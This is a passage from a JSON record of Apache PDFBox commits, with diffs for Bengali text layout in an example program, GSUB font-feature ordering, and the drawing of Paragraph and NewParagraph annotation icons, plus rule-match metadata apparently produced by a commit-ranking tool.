a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -19,4 +19,9 @@ package org.apache.pdfbox.examples.pdmodel;", + "+import java.io.BufferedReader;", + " import java.io.IOException;", + "+import java.io.InputStreamReader;", + " import java.net.URISyntaxException;", + "+import java.util.ArrayList;", + "+import java.util.List;", + "+import java.util.StringTokenizer;", + "@@ -25,5 +30,5 @@ import org.apache.pdfbox.pdmodel.PDPage;", + " import org.apache.pdfbox.pdmodel.PDPageContentStream;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + " import org.apache.pdfbox.pdmodel.font.PDFont;", + " import org.apache.pdfbox.pdmodel.font.PDType0Font;", + "-import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + "@@ -32,5 +37,4 @@ import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", + " * \"https://svn.apache.org/viewvc/pdfbox/trunk/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/HelloWorldTTF.java?view=markup\">PdfBox", + "- * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", + "- * supported. First, we render some text, and then embed an image with the correct text displayed on", + "- * the next page.", + "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is supported. First, we", + "+ * render some text, and then embed an image with the correct text displayed on the next page.", + " *", + "@@ -41,13 +45,7 @@ public class BengaliPdfGenerationHelloWorld", + " {", + "- /**", + "- * The unicode of this is given below:", + "- * ", + "- *

    ",
    +                "-     * \\u0986\\u09ae\\u09bf  \\u0995\\u09cb\\u09a8 \\u09aa\\u09a5\\u09c7  \\u0995\\u09cd\\u09b7\\u09c0\\u09b0\\u09c7\\u09b0 \\u09b7\\u09a8\\u09cd\\u09a1  \\u09aa\\u09c1\\u09a4\\u09c1\\u09b2 \\u09b0\\u09c1\\u09aa\\u09cb  \\u0997\\u0999\\u09cd\\u0997\\u09be \\u098b\\u09b7\\u09bf",
    +                "-     * 
    ", + "- * ", + "- */", + "- private static final String BANGLA_TEXT_1 = \"\u00e0\u00a6\u0086\u00e0\u00a6\u00ae\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a7\u008b\u00e0\u00a6\u00a8 \u00e0\u00a6\u00aa\u00e0\u00a6\u00a5\u00e0\u00a7\u0087 \u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u0080\u00e0\u00a6\u00b0\u00e0\u00a7\u0087\u00e0\u00a6\u00b0 \u00e0\u00a6\u00b2\u00e0\u00a6\u0095\u00e0\u00a7\u008d\u00e0\u00a6\u00b7\u00e0\u00a7\u008d\u00e0\u00a6\u00ae\u00e0\u00a7\u0080 \u00e0\u00a6\u00b7\u00e0\u00a6\u00a8\u00e0\u00a7\u008d\u00e0\u00a6\u00a1 \u00e0\u00a6\u00aa\u00e0\u00a7\u0081\u00e0\u00a6\u00a4\u00e0\u00a7\u0081\u00e0\u00a6\u00b2 \u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00aa\u00e0\u00a7\u008b \u00e0\u00a6\u0097\u00e0\u00a6\u0099\u00e0\u00a7\u008d\u00e0\u00a6\u0097\u00e0\u00a6\u00be \u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf\";", + "- private static final String BANGLA_TEXT_2 = \"\u00e0\u00a6\u00a6\u00e0\u00a7\u008d\u00e0\u00a6\u00b0\u00e0\u00a7\u0081\u00e0\u00a6\u00a4 \u00e0\u00a6\u0097\u00e0\u00a6\u00be\u00e0\u00a6\u00a2\u00e0\u00a6\u00bc \u00e0\u00a6\u00b6\u00e0\u00a7\u0087\u00e0\u00a6\u00af\u00e0\u00a6\u00bc\u00e0\u00a6\u00be\u00e0\u00a6\u00b2 \u00e0\u00a6\u0085\u00e0\u00a6\u00b2\u00e0\u00a6\u00b8 \u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u0095\u00e0\u00a7\u0081\u00e0\u00a6\u00b0 \u00e0\u00a6\u009c\u00e0\u00a7\u0081\u00e0\u00a6\u00a1\u00e0\u00a6\u00bc\u00e0\u00a7\u0087 \u00e0\u00a6\u009c\u00e0\u00a6\u00be\u00e0\u00a6\u00ae\u00e0\u00a7\u008d\u00e0\u00a6\u00aa \u00e0\u00a6\u00a7\u00e0\u00a7\u0081\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00a4 \u00e0\u00a6\u00b9\u00e0\u00a6\u00a0\u00e0\u00a6\u00be\u00e0\u00a7\u008e \u00e0\u00a6\u00ad\u00e0\u00a6\u00be\u00e0\u00a6\u0099\u00e0\u00a7\u0087\u00e0\u00a6\u00a8\u00e0\u00a6\u00bf \u00e0\u00a6\u00ae\u00e0\u00a7\u008c\u00e0\u00a6\u00b2\u00e0\u00a6\u00bf\u00e0\u00a6\u0095 \u00e0\u00a6\u0090\u00e0\u00a6\u00b6\u00e0\u00a6\u00bf \u00e0\u00a6\u00a6\u00e0\u00a7\u0088\";", + "- private static final String BANGLA_TEXT_3 = \"\u00e0\u00a6\u008b\u00e0\u00a6\u00b7\u00e0\u00a6\u00bf \u00e0\u00a6\u0095\u00e0\u00a6\u00b2\u00e0\u00a7\u008d\u00e0\u00a6\u00b2\u00e0\u00a7\u008b\u00e0\u00a6\u00b2 \u00e0\u00a6\u00ac\u00e0\u00a7\u008d\u00e0\u00a6\u00af\u00e0\u00a6\u00be\u00e0\u00a6\u00b8 \u00e0\u00a6\u00a8\u00e0\u00a6\u00bf\u00e0\u00a6\u00b0\u00e0\u00a7\u008d\u00e0\u00a6\u00ad\u00e0\u00a7\u009f \";", + "+ private static final int LINE_GAP = 5;", + "+ private static final String LOHIT_BENGALI_TTF = \"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\";", + "+ private static final String TEXT_SOURCE_FILE = \"/org/apache/pdfbox/resources/ttf/bengali-samples.txt\";", + "+ private static final int FONT_SIZE = 20;", + "+ private static final int MARGIN = 20;", + "@@ -68,3 +66,3 @@ public class BengaliPdfGenerationHelloWorld", + " private BengaliPdfGenerationHelloWorld()", + "- { ", + "+ {", + " }", + "@@ -86,28 +84,35 @@ public class BengaliPdfGenerationHelloWorld", + " {", + "- PDPage page1 = new PDPage();", + "- doc.addPage(page1);", + "-", + "- PDFont font = PDType0Font.load(doc, BengaliPdfGenerationHelloWorld.class", + "- .getResourceAsStream(\"/org/apache/pdfbox/resources/ttf/Lohit-Bengali.ttf\"),", + "+ PDFont font = PDType0Font.load(doc,", + "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(LOHIT_BENGALI_TTF),", + " true);", + "+ PDRectangle rectangle = getPageSize();", + "+ float workablePageWidth = rectangle.getWidth() - 2 * MARGIN;", + "+ float workablePageHeight = rectangle.getHeight() - 2 * MARGIN;", + "+", + "+ List> pagedTexts = getReAlignedTextBasedOnPageHeight(", + "+ getReAlignedTextBasedOnPageWidth(getBengaliTextFromFile(), font,", + "+ workablePageWidth),", + "+ font, workablePageHeight);", + "- try (PDPageContentStream contents = new PDPageContentStream(doc, page1))", + "+ for (List linesForPage : pagedTexts)", + " {", + "- contents.beginText();", + "- contents.setFont(font, 12);", + "- contents.newLineAtOffset(10, 750);", + "- contents.showText(BANGLA_TEXT_1);", + "- contents.newLineAtOffset(0, -50);", + "- contents.showText(BANGLA_TEXT_2);", + "- contents.newLineAtOffset(0, -30);", + "- contents.showText(BANGLA_TEXT_3);", + "- contents.endText();", + "- ", + "- PDImageXObject pdImage = PDImageXObject", + "- .createFromFile(BengaliPdfGenerationHelloWorld.class", + "- .getResource(", + "- \"/org/apache/pdfbox/resources/ttf/bengali-correct-text.png\")", + "- // getFile() doesn't work if there is a space in the path", + "- .toURI().getPath(), doc);", + "- contents.drawImage(pdImage, 0, 300, pdImage.getWidth(), pdImage.getHeight());", + "+ PDPage page = new PDPage(getPageSize());", + "+ doc.addPage(page);", + "+", + "+ try (PDPageContentStream contents = new PDPageContentStream(doc, page))", + "+ {", + "+ contents.beginText();", + "+ contents.setFont(font, FONT_SIZE);", + "+ contents.newLineAtOffset(rectangle.getLowerLeftX() + MARGIN,", + "+ rectangle.getUpperRightY() - MARGIN);", + "+", + "+ for (String line : linesForPage)", + "+ {", + "+ contents.showText(line);", + "+ contents.newLineAtOffset(0, -(FONT_SIZE + LINE_GAP));", + "+ }", + "+", + "+ contents.endText();", + "+", + "+ }", + " }", + "@@ -118,2 +123,98 @@ public class BengaliPdfGenerationHelloWorld", + "+ private static List> getReAlignedTextBasedOnPageHeight(List originalLines,", + "+ PDFont font, float workablePageHeight)", + "+ {", + "+ final float newLineHeight = font.getFontDescriptor().getFontBoundingBox().getHeight() / 1000", + "+ * FONT_SIZE + LINE_GAP;", + "+ List> realignedTexts = new ArrayList<>();", + "+ float consumedHeight = 0;", + "+ List linesInAPage = new ArrayList<>();", + "+ for (String line : originalLines)", + "+ {", + "+ if (newLineHeight + consumedHeight < workablePageHeight)", + "+ {", + "+ consumedHeight += newLineHeight;", + "+ }", + "+ else", + "+ {", + "+ consumedHeight = newLineHeight;", + "+ realignedTexts.add(linesInAPage);", + "+ linesInAPage = new ArrayList<>();", + "+ }", + "+", + "+ linesInAPage.add(line);", + "+ }", + "+ return realignedTexts;", + "+ }", + "+", + "+ private static List getReAlignedTextBasedOnPageWidth(List originalLines,", + "+ PDFont font, float workablePageWidth) throws IOException", + "+ {", + "+ List uniformlyWideTexts = new ArrayList<>();", + "+ float consumedWidth = 0;", + "+ StringBuilder sb = new StringBuilder();", + "+ for (String line : originalLines)", + "+ {", + "+ float newTokenWidth = 0;", + "+ StringTokenizer st = new StringTokenizer(line, \" \", true);", + "+ while (st.hasMoreElements())", + "+ {", + "+ String token = st.nextToken();", + "+ newTokenWidth = font.getStringWidth(token) / 1000 * FONT_SIZE;", + "+ if (newTokenWidth + consumedWidth < workablePageWidth)", + "+ {", + "+ consumedWidth += newTokenWidth;", + "+ }", + "+ else", + "+ {", + "+ // add a new text chunk", + "+ uniformlyWideTexts.add(sb.toString());", + "+ consumedWidth = newTokenWidth;", + "+ sb = new StringBuilder();", + "+ }", + "+", + "+ sb.append(token);", + "+ }", + "+", + "+ // add a new text chunk", + "+ uniformlyWideTexts.add(sb.toString());", + "+ consumedWidth = newTokenWidth;", + "+ sb = new StringBuilder();", + "+ }", + "+", + "+ return uniformlyWideTexts;", + "+ }", + "+", + "+ private static PDRectangle getPageSize()", + "+ {", + "+ return PDRectangle.A4;", + "+ }", + "+", + "+ private static List getBengaliTextFromFile() throws IOException", + "+ {", + "+ List lines = new ArrayList<>();", + "+", + "+ try (BufferedReader br = new BufferedReader(new InputStreamReader(", + "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE)));)", + "+ {", + "+ while (true)", + "+ {", + "+ String line = br.readLine();", + "+", + "+ if (line == null)", + "+ {", + "+ break;", + "+ }", + "+", + "+ if (line.startsWith(\"#\"))", + "+ {", + "+ continue;", + "+ }", + "+ lines.add(line);", + "+ }", + "+ }", + "+", + "+ return lines;", + "+ }", + "+", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "index 6eaec7b02..dd6db9410 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "@@ -116,5 +116,2 @@ public class GlyphSubstitutionDataExtractor", + "- LOG.debug(\"*********** extracting GSUB data for the feature: \"", + "- + featureRecord.getFeatureTag());", + "-", + " Map, Integer> glyphSubstitutionMap = new LinkedHashMap<>();", + "@@ -125,2 +122,7 @@ public class GlyphSubstitutionDataExtractor", + " }", + "+", + "+ LOG.debug(\"*********** extracting GSUB data for the feature: \"", + "+ + featureRecord.getFeatureTag() + \", glyphSubstitutionMap: \"", + "+ + glyphSubstitutionMap);", + "+", + " gsubData.put(featureRecord.getFeatureTag(),", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "index 396a9b549..eefaed591 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "@@ -51,3 +51,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", + "- \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", + "+ \"rphf\", \"blwf\", \"pstf\", \"half\", \"vatu\", \"cjct\", INIT_FEATURE, \"pres\", \"abvs\", \"blws\",", + " \"psts\", \"haln\", \"calt\");" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "81931fe65d66b2dc3b43f0fcaef6c7de40ca95c1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528034291, + "hunks": 1, + "message": "PDFBOX-3353: remove wrong comment; don't skip for width = 0, this is done by drawShape that outputs an \"n\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832770 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 68a59bee0..ebd7eb35c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -73,15 +73,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // width 0 = no border", + "- // pdf_commenting_new.pdf page 3", + "- // Root/Pages/Kids/[2]/Kids/[0]/Annots/[5]/BS/W", + "- if (Float.compare(ab.width, 0) == 0)", + "- {", + "- //TODO what happens if there is a callout?", + "- //TODO skip, don't return when we know how to make text", + "- // (maybe refactor the rectangle drawing segment)", + "- return;", + "- }", + "-", + "- //TODO how to set the text color? Apparently red is the default????", + "-", + " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "add729b9226dd34d02ab3f48bffdddcacf1aa61a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525006413, + "hunks": 2, + "message": "PDFBOX-4189: force utf8 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830510 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index d98b9b3c9..8fa6c9337 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -33,2 +33,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", + " import org.apache.pdfbox.pdmodel.font.PDType0Font;", + "+import org.apache.pdfbox.util.Charsets;", + "@@ -198,3 +199,3 @@ public class BengaliPdfGenerationHelloWorld", + " try (BufferedReader br = new BufferedReader(new InputStreamReader(", + "- BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE)));)", + "+ BengaliPdfGenerationHelloWorld.class.getResourceAsStream(TEXT_SOURCE_FILE), Charsets.UTF_8));)", + " {" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "cb82a7afef1616e3671ae8c35b0d5b14a677491b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528821312, + "hunks": 23, + "message": "PDFBOX-3353: support /Paragraph and /NewParagraph; use fixed sizes for BBox, adjust rectangle only if NoZoom isn't set, set flags if missing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833411 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 41e9a55b1..c4776034d 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -25,2 +25,3 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.pdfbox.cos.COSName;", + " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "@@ -52,2 +53,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " SUPPORTED_NAMES.add(PDAnnotationText.NAME_CIRCLE);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_PARAGRAPH);", + "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_NEW_PARAGRAPH);", + " }", + "@@ -73,3 +76,6 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- //TODO Comment, Key, NewParagraph, Paragraph", + "+ //TODO Comment, Key", + "+ // BBox values:", + "+ // key 18 18", + "+ // Comment 18 18", + " return;", + "@@ -93,6 +99,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- PDRectangle rect = getRectangle();", + "- PDRectangle bbox = rect.createRetranslatedRectangle();", + "- annotation.getNormalAppearanceStream().setBBox(bbox);", + "-", + " switch (annotation.getName())", + "@@ -100,15 +102,21 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " case PDAnnotationText.NAME_NOTE:", + "- drawNote(contentStream, bbox);", + "+ drawNote(annotation, contentStream);", + " break;", + " case PDAnnotationText.NAME_CROSS:", + "- drawCross(contentStream, bbox);", + "+ drawCross(annotation, contentStream);", + " break;", + " case PDAnnotationText.NAME_CIRCLE:", + "- drawCircles(contentStream, bbox);", + "+ drawCircles(annotation, contentStream);", + " break;", + " case PDAnnotationText.NAME_INSERT:", + "- drawInsert(contentStream, bbox);", + "+ drawInsert(annotation, contentStream);", + " break;", + " case PDAnnotationText.NAME_HELP:", + "- drawHelp(contentStream, bbox);", + "+ drawHelp(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_PARAGRAPH:", + "+ drawParagraph(annotation, contentStream);", + "+ break;", + "+ case PDAnnotationText.NAME_NEW_PARAGRAPH:", + "+ drawNewParagraph(annotation, contentStream);", + " break;", + "@@ -124,6 +132,40 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ private PDRectangle adjustRectAndBBox(PDAnnotationText annotation, float width, float height)", + "+ {", + "+ // For /Note (other types have different values):", + "+ // Adobe takes the left upper bound as anchor, and adjusts the rectangle to 18 x 20.", + "+ // Observed with files 007071.pdf, 038785.pdf, 038787.pdf,", + "+ // but not with 047745.pdf p133 and 084374.pdf p48, both have the NoZoom flag.", + "+ // there the BBox is also set to fixed values, but the rectangle is left untouched.", + "+ // When no flags are there, Adobe sets /F 24 = NoZoom NoRotate.", + "+ ", + "+ PDRectangle rect = getRectangle();", + "+ PDRectangle bbox;", + "+ if (!annotation.isNoZoom())", + "+ {", + "+ rect.setUpperRightX(rect.getLowerLeftX() + width);", + "+ rect.setLowerLeftY(rect.getUpperRightY() - height);", + "+ annotation.setRectangle(rect);", + "+ }", + "+ if (!annotation.getCOSObject().containsKey(COSName.F))", + "+ {", + "+ // We set these flags because Adobe does so, but PDFBox doesn't support them when rendering.", + "+ annotation.setNoRotate(true);", + "+ annotation.setNoZoom(true);", + "+ }", + "+ bbox = new PDRectangle(width, height);", + "+ annotation.getNormalAppearanceStream().setBBox(bbox);", + "+ return bbox;", + "+ }", + "+", + "+ private void drawNote(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + " {", + "- contentStream.setLineJoinStyle(1); // get round edge the easy way", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 18, 20);", + "+ contentStream.setMiterLimit(4);", + "+", + "+ // get round edge the easy way. Adobe uses 4 lines with 4 arcs of radius 0.785 which is bigger.", + "+ contentStream.setLineJoinStyle(1);", + "+", + "+ contentStream.setLineCapStyle(0);", + " contentStream.setLineWidth(0.61f); // value from Adobe", + "@@ -141,5 +183,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawCircles(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ private void drawCircles(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + " {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", + "+", + " // strategy used by Adobe:", + "@@ -152,6 +196,4 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- // should be a square, but who knows...", + "- float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "- float smallR = min / 20 * 6.36f;", + "- float largeR = min / 20 * 9.756f;", + "+ float smallR = 6.36f;", + "+ float largeR = 9.756f;", + "@@ -179,5 +221,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawInsert(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ private void drawInsert(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + " {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 17, 20);", + "+", + " contentStream.setMiterLimit(4);", + "@@ -192,5 +236,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawCross(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ private void drawCross(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + " {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 19, 19);", + "+", + " // should be a square, but who knows...", + "@@ -223,5 +269,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "- private void drawHelp(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ private void drawHelp(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + " throws IOException", + " {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", + "+", + " float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "@@ -251,3 +299,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.transform(Matrix.getScaleInstance(0.001f * min / 2.25f, 0.001f * min / 2.25f));", + "- contentStream.transform(Matrix.getTranslateInstance(540, 375));", + "+ contentStream.transform(Matrix.getTranslateInstance(555, 375));", + "@@ -256,2 +304,80 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " GeneralPath path = PDType1Font.HELVETICA.getPath(\"question\");", + "+ addPath(contentStream, path);", + "+ contentStream.restoreGraphicsState();", + "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ //TODO this is mostly identical to drawHelp, except for scale, translation and symbol", + "+ private void drawParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", + "+", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ // Adobe first fills a white circle with CA ca 0.6, so do we", + "+ contentStream.saveGraphicsState();", + "+ contentStream.setLineWidth(1);", + "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", + "+ gs.setAlphaSourceFlag(false);", + "+ gs.setStrokingAlphaConstant(0.6f);", + "+ gs.setNonStrokingAlphaConstant(0.6f);", + "+ gs.setBlendMode(BlendMode.NORMAL);", + "+ contentStream.setGraphicsStateParameters(gs);", + "+ contentStream.setNonStrokingColor(1f);", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fill();", + "+ contentStream.restoreGraphicsState();", + "+", + "+ contentStream.saveGraphicsState();", + "+ // rescale so that \"?\" fits into circle and move \"?\" to circle center", + "+ // values gathered by trial and error", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 3, 0.001f * min / 3));", + "+ contentStream.transform(Matrix.getTranslateInstance(850, 900));", + "+", + "+ // we get the shape of an Helvetica \"?\" and use that one.", + "+ // Adobe uses a different font (which one?), or created the shape from scratch.", + "+ GeneralPath path = PDType1Font.HELVETICA.getPath(\"paragraph\");", + "+ addPath(contentStream, path);", + "+ contentStream.restoreGraphicsState();", + "+ // draw the outer circle counterclockwise to fill area between circle and \"?\"", + "+ drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "+ contentStream.fillAndStroke();", + "+ }", + "+", + "+ private void drawNewParagraph(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", + "+ throws IOException", + "+ {", + "+ adjustRectAndBBox(annotation, 13, 20);", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(0);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ // small triangle (values from Adobe)", + "+ contentStream.moveTo(6.4995f, 20);", + "+ contentStream.lineTo(0.295f, 7.287f);", + "+ contentStream.lineTo(12.705f, 7.287f);", + "+ contentStream.closeAndFillAndStroke();", + "+", + "+ // rescale and translate so that \"NP\" fits below the triangle", + "+ // values gathered by trial and error", + "+ contentStream.transform(Matrix.getScaleInstance(0.001f * 4, 0.001f * 4));", + "+ contentStream.transform(Matrix.getTranslateInstance(200, 0));", + "+ addPath(contentStream, PDType1Font.HELVETICA_BOLD.getPath(\"N\"));", + "+ contentStream.transform(Matrix.getTranslateInstance(1300, 0));", + "+ addPath(contentStream, PDType1Font.HELVETICA_BOLD.getPath(\"P\"));", + "+ contentStream.fill();", + "+ }", + "+", + "+ private void addPath(final PDAppearanceContentStream contentStream, GeneralPath path) throws IOException", + "+ {", + " PathIterator it = path.getPathIterator(new AffineTransform());", + "@@ -285,6 +411,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- contentStream.restoreGraphicsState();", + "- // draw the outer circle counterclockwise to fill area between circle and \"?\"", + "- drawCircle2(contentStream, min / 2, min / 2, min / 2 - 1);", + "- contentStream.fillAndStroke();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": 